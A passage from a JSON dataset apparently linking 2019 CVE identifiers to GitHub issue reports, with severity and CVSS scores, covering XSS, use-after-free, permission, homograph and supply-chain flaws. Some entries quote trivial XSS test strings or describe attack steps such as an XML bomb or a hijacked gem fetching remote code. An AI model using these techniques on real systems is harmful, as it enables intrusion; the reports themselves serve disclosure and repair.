changed to hacked asd. The attacker can even change the password of the admin and takeover his account. In this case I have changed the password of admin to admin NUMBERTAG FILETAG Suggested steps In most situations where user controllable data is copied into application responses, cross site scripting attacks can be prevented using two layers of defenses NUMBERTAG Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well defined regular expression. Input which fails the validation should be rejected, not sanitized NUMBERTAG User input should be HTML encoded at any point where it is copied into application responses. All HTML metacharacters, including < > \" ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non trivial task. Here the xss protection is by using blacklist. Please don't use that, instead use the above mentioned approach",
  37904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  37905. "severity": "HIGH",
  37906. "baseScore": 8.0,
  37907. "impactScore": 5.9,
  37908. "exploitabilityScore": 2.1
  37909. },
  37910. {
  37911. "CVE_ID": "CVE-2019-15095",
  37912. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/48",
  37913. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/48",
  37914. "Repo_new": "wkeyuan/dwsurvey",
  37915. "Issue_Created_At": "2019-08-13T11:38:03Z",
  37916. "description": "[security vulnerability] Reflective XSS when view the survey result. There is a Reflective XSS vulnerability when user view the survey result. The failure of the XSS filter to work properly resulted in this vulnerability\uff0c which allows remote attackers to inject arbitrary web script or steal admin's or other users cookies. The impact of the problem is serious especially when combined with CSRF vulnerability exploitation. Vulnerability file: PATHTAG APITAG PATHTAG ('XSS');<\/script NUMBERTAG",
  37917. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37918. "severity": "MEDIUM",
  37919. "baseScore": 6.1,
  37920. "impactScore": 2.7,
  37921. "exploitabilityScore": 2.8
  37922. },
  37923. {
  37924. "CVE_ID": "CVE-2019-15119",
  37925. "Issue_Url_old": "https://github.com/cnlh/nps/issues/176",
  37926. "Issue_Url_new": "https://github.com/ehang-io/nps/issues/176",
  37927. "Repo_new": "ehang-io/nps",
  37928. "Issue_Created_At": "2019-08-14T16:03:43Z",
  37929. "description": "Permission problems on NPS Install. Dear NPS, I would like to report a security vulnerability in NPS. There is a problem with file permission that allow regular access to write or access information that they are not supposed to. On the file install.go, the nps file is copied to PATHTAG or PATHTAG but then permission are changed to NUMBERTAG through a call to APITAG allowing every user to modify the binary. A potential attacker could replace the binary to something malicious and the next time a valid user run it, it will be executing the attacker's file. func APITAG { [...] if APITAG { if _, err := APITAG \"nps\"), PATHTAG ); err != nil { if _, err := APITAG \"nps\"), PATHTAG ); err != nil { APITAG } else { APITAG PATHTAG NUMBERTAG Wrong Permission set APITAG files have been copied to\", PATHTAG ) } } else { APITAG PATHTAG NUMBERTAG Wrong Permission set APITAG files have been copied to\", PATHTAG ) } Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37930. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  37931. "severity": "MEDIUM",
  37932. "baseScore": 5.5,
  37933. "impactScore": 3.6,
  37934. "exploitabilityScore": 1.8
  37935. },
  37936. {
  37937. "CVE_ID": "CVE-2019-15136",
  37938. "Issue_Url_old": "https://github.com/eProsima/Fast-RTPS/issues/443",
  37939. "Issue_Url_new": "https://github.com/eprosima/fast-dds/issues/443",
  37940. "Repo_new": "eprosima/fast-dds",
  37941. "Issue_Created_At": "2019-03-08T03:09:03Z",
  37942. "description": "Partition permissions are not enforced for remote participants . Partition permissions are presently only checked when creating local data readers/writers, and are consequently skipped when checking remote readers/writers within the current default Access Control plugin implementation. This effectively nullifies any permission restrictions mandated in the remote participant's permission file, given it must be checked locally to ensure any access control policy is faithfully enforced. The following is a minimal example where only the partition permission checks for creating local data readers/writers are disabled for testing, while leaving the APITAG and APITAG fully intact. The secure publisher and subscriber are altered to connect over a common partition that is non existent in either of the participant's permissions, i.e. the only valid partition allowed by the permission policy is that of the empty string. Such altered fast rtps publisher and subscriber will successfully connect with each other, while consequently fail to connect to other secure dds implementation (that happen to be properly provisioned with the sufficient partition permission). ERRORTAG I tried patching the APITAG APITAG classes to bubble up the necessary partition name context, thus allow for APITAG checks (presently absent) to be evokable in the APITAG and APITAG callbacks, however I have yet to have time to comb through layers of generic types and call sites to find where such a context (the partition name connecting the remote participant) could be passed along. As with URLTAG , this was uncovered during my development of a formal verification framework for the default DDS Security Access Control plugins and procedurally generated permission files.",
  37943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  37944. "severity": "HIGH",
  37945. "baseScore": 7.5,
  37946. "impactScore": 3.6,
  37947. "exploitabilityScore": 3.9
  37948. },
  37949. {
  37950. "CVE_ID": "CVE-2019-15137",
  37951. "Issue_Url_old": "https://github.com/eProsima/Fast-RTPS/issues/441",
  37952. "Issue_Url_new": "https://github.com/eprosima/fast-dds/issues/441",
  37953. "Repo_new": "eprosima/fast-dds",
  37954. "Issue_Created_At": "2019-03-08T01:59:51Z",
  37955. "description": "Misuse of fnmatch used by DDS Security Access Control. The following two way fnmatch implementation allows for remote data readers/writers to use the topic name string as the expression to pattern match against its respective permissions: URLTAG This is counter to the OMG DDS Security specification for the default Access Control plugin, given that only the permission expressions themselves should be evaluated as the pattern when matching the POSIX fnmatch function. This can be illustrated by modifying the APITAG to communicate over the selected side channel APITAG without necessarily updating the provided permissions; that otherwise explicitly deny all topics excluding APITAG : CODETAG This issue seems to have persisted since release NUMBERTAG URLTAG",
  37956. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  37957. "severity": "HIGH",
  37958. "baseScore": 7.5,
  37959. "impactScore": 3.6,
  37960. "exploitabilityScore": 3.9
  37961. },
  37962. {
  37963. "CVE_ID": "CVE-2019-15139",
  37964. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1553",
  37965. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1553",
  37966. "Repo_new": "imagemagick/imagemagick",
  37967. "Issue_Created_At": "2019-04-20T13:04:54Z",
  37968. "description": "APITAG Invalid read at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description When reading on XWD files APITAG may suffer from a crash caused by invalid memory read. Steps to Reproduce run APITAG or APITAG . A report from an APITAG compiled APITAG is like this: ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: This was firstly detected when fuzzing APITAG POCs: FILETAG FILETAG Other information available here URLTAG .",
  37969. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37970. "severity": "MEDIUM",
  37971. "baseScore": 6.5,
  37972. "impactScore": 3.6,
  37973. "exploitabilityScore": 2.8
  37974. },
  37975. {
  37976. "CVE_ID": "CVE-2019-15140",
  37977. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1554",
  37978. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1554",
  37979. "Repo_new": "imagemagick/imagemagick",
  37980. "Issue_Created_At": "2019-04-27T07:14:42Z",
  37981. "description": "APITAG heap use after free at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG convert suffers from a heap use after free vulnerability. Steps to Reproduce run APITAG ERRORTAG POC files are available here URLTAG . System Configuration APITAG APITAG version NUMBERTAG Q NUMBERTAG a NUMBERTAG ae) Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: It reports an assertion failure with regular debug mode compilation.",
  37982. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37983. "severity": "HIGH",
  37984. "baseScore": 8.8,
  37985. "impactScore": 5.9,
  37986. "exploitabilityScore": 2.8
  37987. },
  37988. {
  37989. "CVE_ID": "CVE-2019-15141",
  37990. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1560",
  37991. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1560",
  37992. "Repo_new": "imagemagick/imagemagick",
  37993. "Issue_Created_At": "2019-04-28T11:01:35Z",
  37994. "description": "APITAG heap buffer overflow at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ( URLTAG still suffers from heap buffer overflow error after with the patch that stresses URLTAG . Steps to Reproduce Run APITAG When linked with prebuilt libtiff.so from Ubuntu NUMBERTAG LTS NUMBERTAG APITAG reports: ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information:",
  37995. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37996. "severity": "MEDIUM",
  37997. "baseScore": 6.5,
  37998. "impactScore": 3.6,
  37999. "exploitabilityScore": 2.8
  38000. },
  38001. {
  38002. "CVE_ID": "CVE-2019-15146",
  38003. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/60",
  38004. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/60",
  38005. "Repo_new": "gopro/gpmf-parser",
  38006. "Issue_Created_At": "2019-05-17T09:21:41Z",
  38007. "description": "Multiple crashes when parsing MP4 files. As of e NUMBERTAG b NUMBERTAG when running APITAG , it may report with crashes when building with APITAG Please see below for details.",
  38008. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38009. "severity": "MEDIUM",
  38010. "baseScore": 6.5,
  38011. "impactScore": 3.6,
  38012. "exploitabilityScore": 2.8
  38013. },
  38014. {
  38015. "CVE_ID": "CVE-2019-15151",
  38016. "Issue_Url_old": "https://github.com/adplug/adplug/issues/91",
  38017. "Issue_Url_new": "https://github.com/adplug/adplug/issues/91",
  38018. "Repo_new": "adplug/adplug",
  38019. "Issue_Created_At": "2019-08-09T07:51:21Z",
  38020. "description": "Double free in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a double free in APITAG in src/u6m.h L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
  38021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38022. "severity": "CRITICAL",
  38023. "baseScore": 9.8,
  38024. "impactScore": 5.9,
  38025. "exploitabilityScore": 3.9
  38026. },
  38027. {
  38028. "CVE_ID": "CVE-2019-15160",
  38029. "Issue_Url_old": "https://github.com/kbrw/sweet_xml/issues/71",
  38030. "Issue_Url_new": "https://github.com/kbrw/sweet_xml/issues/71",
  38031. "Repo_new": "kbrw/sweet_xml",
  38032. "Issue_Created_At": "2019-03-30T16:30:34Z",
  38033. "description": "Inline DTD allows XML bomb attack. This is Wiki page for the vulnerability, it is a very well known XML parser vulnerability: URLTAG To replicate this issue in APITAG you can do the following in an iex session and watch in the observer: FILETAG NUMBERTAG minutes or so later, and it's still running! I was looking into xmerl a bit to see if there's a way to disable inline DTD when using xpath before opening this issue, but I'm not familiar enough with it yet. Hoping someone else may be able to chime in. The closest thing I could find was in the FILETAG there's an option to turn off external DTD parsing. That sounds like that wouldn't solve this issue though, because internal DTD is the problem.",
  38034. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38035. "severity": "HIGH",
  38036. "baseScore": 7.5,
  38037. "impactScore": 3.6,
  38038. "exploitabilityScore": 3.9
  38039. },
  38040. {
  38041. "CVE_ID": "CVE-2019-15224",
  38042. "Issue_Url_old": "https://github.com/rest-client/rest-client/issues/713",
  38043. "Issue_Url_new": "https://github.com/rest-client/rest-client/issues/713",
  38044. "Repo_new": "rest-client/rest-client",
  38045. "Issue_Created_At": "2019-08-19T10:45:06Z",
  38046. "description": "Warning! is rest client NUMBERTAG hijacked?. Hi, It seems that rest client NUMBERTAG is uploaded to APITAG I did review between NUMBERTAG and NUMBERTAG and it seems that latest version evaluate remote code from pastebin.com and sends information to APITAG request.rb: ERRORTAG code from APITAG ERRORTAG BR, Jussi",
  38047. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38048. "severity": "CRITICAL",
  38049. "baseScore": 9.8,
  38050. "impactScore": 5.9,
  38051. "exploitabilityScore": 3.9
  38052. },
  38053. {
  38054. "CVE_ID": "CVE-2019-15226",
  38055. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/8520",
  38056. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/8520",
  38057. "Repo_new": "envoyproxy/envoy",
  38058. "Issue_Created_At": "2019-10-07T19:46:57Z",
  38059. "description": "TBA for Security Release. WARNING: If you want to report crashes, leaking of sensitive information, and/or other security issues, please consider reporting them using appropriate channels URLTAG . Issue Template Title : One line description Description : APITAG the issue. Please be detailed. If a feature request, please describe the desired behaviour, what scenario it enables and how it would be used. FILETAG gathers a tarball with debug logs, config and the following admin endpoints: /stats, /clusters and /server_info. Please note if there are privacy concerns, sanitize the data prior to sharing the tarball/pasting. Admin and Stats Output : APITAG the admin output for the following endpoints: /stats, /clusters, /routes, /server_info. For more information, refer to the admin endpoint documentation. URLTAG > Note : If there are privacy concerns, sanitize the data prior to sharing. Config : APITAG the config used to configure Envoy. Logs : APITAG the access logs and the Envoy logs. > Note : If there are privacy concerns, sanitize the data prior to sharing. Call Stack : > If the Envoy binary is crashing, a call stack is required . Please refer to the Bazel Stack trace documentation URLTAG .",
  38060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38061. "severity": "HIGH",
  38062. "baseScore": 7.5,
  38063. "impactScore": 3.6,
  38064. "exploitabilityScore": 3.9
  38065. },
  38066. {
  38067. "CVE_ID": "CVE-2019-15228",
  38068. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/536",
  38069. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/536",
  38070. "Repo_new": "daylightstudio/fuel-cms",
  38071. "Issue_Created_At": "2019-08-17T17:52:01Z",
  38072. "description": "XSS and CSRF in Blocks. FILETAG FILETAG FILETAG FILETAG FILETAG",
  38073. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38074. "severity": "MEDIUM",
  38075. "baseScore": 5.4,
  38076. "impactScore": 2.7,
  38077. "exploitabilityScore": 2.3
  38078. },
  38079. {
  38080. "CVE_ID": "CVE-2019-15237",
  38081. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6891",
  38082. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6891",
  38083. "Repo_new": "roundcube/roundcubemail",
  38084. "Issue_Created_At": "2019-08-18T21:31:57Z",
  38085. "description": "IDN homograph attack when displaying e mail addresses.. Homograph attack is a security vulnerability that can deceive users into thinking they are visiting a certain website or the origin of an e mail when in fact it is a different, but homograph, domain name. This type of vulnerability can be used to weaponize social engineering, significantly increasing the chances for a successful attack. I have created a homograph of here.com using purely cyrillic characters PATHTAG (the punycode is xn APITAG I have other homographs, too, and registering them isn't a big deal. So I have sent an e mail from info APITAG c1adb NUMBERTAG c.com as SMTP, DNS, etc. only handle ASCII. However, for the sake of user friendliness, Roundcube will convert the domain name from ASCII to Unicode, without taking into consideration confusables. Therefore, the user will see the e mail as coming from EMAILTAG when in fact it came from another domain, xn APITAG In the case of APITAG the 'r' looks a bit off but this largely depends on the display, system fonts, etc. Other confusables are completely visually indistinguishable. I have attached an example of an e mail coming from xn c1adb NUMBERTAG c.com when rendered in Roundcube. FILETAG Cheers, Julio",
  38086. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  38087. "severity": "HIGH",
  38088. "baseScore": 7.4,
  38089. "impactScore": 4.0,
  38090. "exploitabilityScore": 2.8
  38091. },
  38092. {
  38093. "CVE_ID": "CVE-2019-15325",
  38094. "Issue_Url_old": "https://github.com/GalliumOS/galliumos-distro/issues/514",
  38095. "Issue_Url_new": "https://github.com/galliumos/galliumos-distro/issues/514",
  38096. "Repo_new": "galliumos/galliumos-distro",
  38097. "Issue_Created_At": "2019-07-12T01:11:28Z",
  38098. "description": "Yama security module not enabled in kernel. Hello All, In experimenting with some of the newer kernels I have found that APITAG is disabled in APITAG This leads to the failure of APITAG which tries to set APITAG to NUMBERTAG We should either enable CONFIG_SECURITY_YAMA or disable NUMBERTAG APITAG Yama is enabled in the default Ubuntu NUMBERTAG with the intent of preventing a malicious attacker from attaching to running processes to examine them with tools like gdb and strace . For more information on this and a better description of the security reasons for enabling this, please see your kernel APITAG . My machine specs are ... APITAG Banon My firmware is essentially APITAG . (He helped me build my own firmware from his git tree.') My installation method was ISO. And to reproduce the problem build kernel NUMBERTAG and look at the dmesg output. The kernel can't set PATHTAG Chris",
  38099. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  38100. "severity": "HIGH",
  38101. "baseScore": 7.5,
  38102. "impactScore": 3.6,
  38103. "exploitabilityScore": 3.9
  38104. },
  38105. {
  38106. "CVE_ID": "CVE-2019-15480",
  38107. "Issue_Url_old": "https://github.com/domoticz/domoticz/issues/3367",
  38108. "Issue_Url_new": "https://github.com/domoticz/domoticz/issues/3367",
  38109. "Repo_new": "domoticz/domoticz",
  38110. "Issue_Created_At": "2019-07-01T08:17:03Z",
  38111. "description": "XSS Vulnerability in FILETAG . Description The FILETAG is vulnerable against XSS. By adding a scene with some scripts in the scene name will lead to an XSS. Obviously this is useful for an attacker if they have the privilege to add or edit scenes. The attacker can execute arbitrary code. Affected Version Current release NUMBERTAG Steps to Reproduce NUMBERTAG Clone and compile it. I follow the instructions from the wiki: URLTAG NUMBERTAG Run domoticz APITAG NUMBERTAG Open APITAG in your browser NUMBERTAG Click button: Add Scene NUMBERTAG Have fun to implement arbitrary scripts or even test it with APITAG FILETAG Fix Some APITAG is used in the FILETAG , but this XSS is still present. Escaping the APITAG fix the XSS. Furthermore use APITAG instead of APITAG . The APITAG function was deprecated in APITAG NUMBERTAG FILETAG",
  38112. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38113. "severity": "MEDIUM",
  38114. "baseScore": 5.4,
  38115. "impactScore": 2.7,
  38116. "exploitabilityScore": 2.3
  38117. },
  38118. {
  38119. "CVE_ID": "CVE-2019-15499",
  38120. "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1263",
  38121. "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1263",
  38122. "Repo_new": "hackmdio/codimd",
  38123. "Issue_Created_At": "2019-08-21T10:09:07Z",
  38124. "description": "Open Redirect / XSS via iframe with sandbox.. Summary This is similar issue to NUMBERTAG but different cause. Due to sandbox attribute is allowed, attacker can redirect victim to something malicious if attacker embeds iframe with APITAG in sandbox attribute NUMBERTAG won't work in Chrome because of their security, but this will work due to sandbox is whitelist attribute. This will be XSS in Safari by using data scheme. Step to reproduce NUMBERTAG Type APITAG in Editor NUMBERTAG iew edited page. APITAG URLTAG APITAG APITAG will redirect you to FILETAG Suggested fix Don't allow sandbox attribute in PATHTAG",
  38125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38126. "severity": "MEDIUM",
  38127. "baseScore": 6.1,
  38128. "impactScore": 2.7,
  38129. "exploitabilityScore": 2.8
  38130. },
  38131. {
  38132. "CVE_ID": "CVE-2019-15507",
  38133. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5761",
  38134. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5761",
  38135. "Repo_new": "octopusdeploy/issues",
  38136. "Issue_Created_At": "2019-08-06T00:33:17Z",
  38137. "description": "Placeholder for NUMBERTAG master. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
  38138. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38139. "severity": "MEDIUM",
  38140. "baseScore": 6.5,
  38141. "impactScore": 3.6,
  38142. "exploitabilityScore": 2.8
  38143. },
  38144. {
  38145. "CVE_ID": "CVE-2019-15508",
  38146. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5750",
  38147. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5750",
  38148. "Repo_new": "octopusdeploy/issues",
  38149. "Issue_Created_At": "2019-08-01T23:06:46Z",
  38150. "description": "Placeholder for NUMBERTAG master. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
  38151. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38152. "severity": "MEDIUM",
  38153. "baseScore": 6.5,
  38154. "impactScore": 3.6,
  38155. "exploitabilityScore": 2.8
  38156. },
  38157. {
  38158. "CVE_ID": "CVE-2019-15532",
  38159. "Issue_Url_old": "https://github.com/gchq/CyberChef/issues/544",
  38160. "Issue_Url_new": "https://github.com/gchq/cyberchef/issues/544",
  38161. "Repo_new": "gchq/cyberchef",
  38162. "Issue_Created_At": "2019-04-23T17:01:56Z",
  38163. "description": "Bug report: Current release version does not include the recent XSS fix. Summary It looks like NUMBERTAG has been fixed in URLTAG but no release has been issued since the fix. Would it be possible to do a quick release APITAG to include the XSS fix? Thanks in advance for your consideration!",
  38164. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38165. "severity": "MEDIUM",
  38166. "baseScore": 6.1,
  38167. "impactScore": 2.7,
  38168. "exploitabilityScore": 2.8
  38169. },
  38170. {
  38171. "CVE_ID": "CVE-2019-15532",
  38172. "Issue_Url_old": "https://github.com/gchq/CyberChef/issues/539",
  38173. "Issue_Url_new": "https://github.com/gchq/cyberchef/issues/539",
  38174. "Repo_new": "gchq/cyberchef",
  38175. "Issue_Created_At": "2019-04-12T15:01:39Z",
  38176. "description": "Bug report: XSS with Encoding Brute Force. Summary While doing a CTF challenge, I was using cyber chef to encode a XSS javascript payload. When I put it through the text encoding brute force, alerts were displayed caused by the script. Example My input was APITAG alert('XSS') APITAG and when I added the brute force encoding multiple alerts popped up.",
  38177. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38178. "severity": "MEDIUM",
  38179. "baseScore": 6.1,
  38180. "impactScore": 2.7,
  38181. "exploitabilityScore": 2.8
  38182. },
  38183. {
  38184. "CVE_ID": "CVE-2019-15535",
  38185. "Issue_Url_old": "https://github.com/hotosm/tasking-manager/issues/1731",
  38186. "Issue_Url_new": "https://github.com/hotosm/tasking-manager/issues/1731",
  38187. "Repo_new": "hotosm/tasking-manager",
  38188. "Issue_Created_At": "2019-06-28T14:40:19Z",
  38189. "description": "Prevent SQL Injection when executing custom SQL. When using simple Python string formatting methods input values are not escaped which opens up the possibility of SQL injection attacks. For example: URLTAG APITAG provides a way to safely pass values to a custom SQL URLTAG",
  38190. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38191. "severity": "CRITICAL",
  38192. "baseScore": 9.8,
  38193. "impactScore": 5.9,
  38194. "exploitabilityScore": 3.9
  38195. },
  38196. {
  38197. "CVE_ID": "CVE-2019-15541",
  38198. "Issue_Url_old": "https://github.com/ctz/rustls/issues/285",
  38199. "Issue_Url_new": "https://github.com/rustls/rustls/issues/285",
  38200. "Repo_new": "rustls/rustls",
  38201. "Issue_Created_At": "2019-08-08T09:07:49Z",
  38202. "description": "bug in rustls mio. I have found the following situation: CODETAG The client is closed and the server is trapped in a loop of APITAG and ready function. URLTAG Maybe we should change the above code to CODETAG Thanks!",
  38203. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38204. "severity": "HIGH",
  38205. "baseScore": 7.5,
  38206. "impactScore": 3.6,
  38207. "exploitabilityScore": 3.9
  38208. },
  38209. {
  38210. "CVE_ID": "CVE-2019-15551",
  38211. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/148",
  38212. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/148",
  38213. "Repo_new": "servo/rust-smallvec",
  38214. "Issue_Created_At": "2019-06-06T15:13:23Z",
  38215. "description": "use after free when growing to the same size. Attempting to call grow on a spilled APITAG with a value equal to the current capacity causes it to free the existing data. CODETAG In the grow method URLTAG it falls through to deallocate. I believe something like the following is the fix: ERRORTAG",
  38216. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38217. "severity": "CRITICAL",
  38218. "baseScore": 9.8,
  38219. "impactScore": 5.9,
  38220. "exploitabilityScore": 3.9
  38221. },
  38222. {
  38223. "CVE_ID": "CVE-2019-15552",
  38224. "Issue_Url_old": "https://github.com/sile/libflate/issues/35",
  38225. "Issue_Url_new": "https://github.com/sile/libflate/issues/35",
  38226. "Repo_new": "sile/libflate",
  38227. "Issue_Created_At": "2019-06-26T01:28:22Z",
  38228. "description": "Use after free on panic in client code. If the code that uses libflate panics, it may trigger a use after free in libflate code. Since use after free usually poses an arbitrary code execution vulnerability, I will relay further details privately to the maintainer. Code compiled with APITAG is not affected. This can be used as a mitigation in the interim.",
  38229. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38230. "severity": "CRITICAL",
  38231. "baseScore": 9.8,
  38232. "impactScore": 5.9,
  38233. "exploitabilityScore": 3.9
  38234. },
  38235. {
  38236. "CVE_ID": "CVE-2019-15553",
  38237. "Issue_Url_old": "https://github.com/Gilnaa/memoffset/issues/9",
  38238. "Issue_Url_new": "https://github.com/gilnaa/memoffset/issues/9",
  38239. "Repo_new": "gilnaa/memoffset",
  38240. "Issue_Created_At": "2019-06-21T20:04:16Z",
  38241. "description": "APITAG is unsound. With the implementation in: ERRORTAG you are constructing a APITAG at address APITAG . This is undefined behavior because Rust may assume that you have a valid APITAG but you do not. Moreover, in the old pre NUMBERTAG implementation you have: ERRORTAG Note that when you say APITAG you have already triggered undefined behavior because again, you assert with APITAG that you have a valid reference but you do not in fact. See URLTAG and URLTAG for a discussion. As for your comment about ERRORTAG , do note that ERRORTAG here does not make what you are doing any less undefined behavior. Instead, while you might not get an error from the compiler, you might get miscompilation should LLVM or rustc's behavior change. cc APITAG",
  38242. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  38243. "severity": "HIGH",
  38244. "baseScore": 7.5,
  38245. "impactScore": 3.6,
  38246. "exploitabilityScore": 3.9
  38247. },
  38248. {
  38249. "CVE_ID": "CVE-2019-15554",
  38250. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/149",
  38251. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/149",
  38252. "Repo_new": "servo/rust-smallvec",
  38253. "Issue_Created_At": "2019-06-06T17:18:23Z",
  38254. "description": "Using grow to shrink can cause corruption.. If grow is given a size that is within the inline size after a APITAG has been spilled, the resulting value is corrupted. ERRORTAG This is admittedly unusual, most code would use APITAG . I think the following should fix it. ERRORTAG",
  38255. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38256. "severity": "CRITICAL",
  38257. "baseScore": 9.8,
  38258. "impactScore": 5.9,
  38259. "exploitabilityScore": 3.9
  38260. },
  38261. {
  38262. "CVE_ID": "CVE-2019-15587",
  38263. "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/171",
  38264. "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/171",
  38265. "Repo_new": "flavorjones/loofah",
  38266. "Issue_Created_At": "2019-10-09T19:30:48Z",
  38267. "description": "placeholder embargoes security vulnerability. This issue has been created for eventual public disclosure of a vulnerability in Loofah.",
  38268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38269. "severity": "MEDIUM",
  38270. "baseScore": 5.4,
  38271. "impactScore": 2.7,
  38272. "exploitabilityScore": 2.3
  38273. },
  38274. {
  38275. "CVE_ID": "CVE-2019-15651",
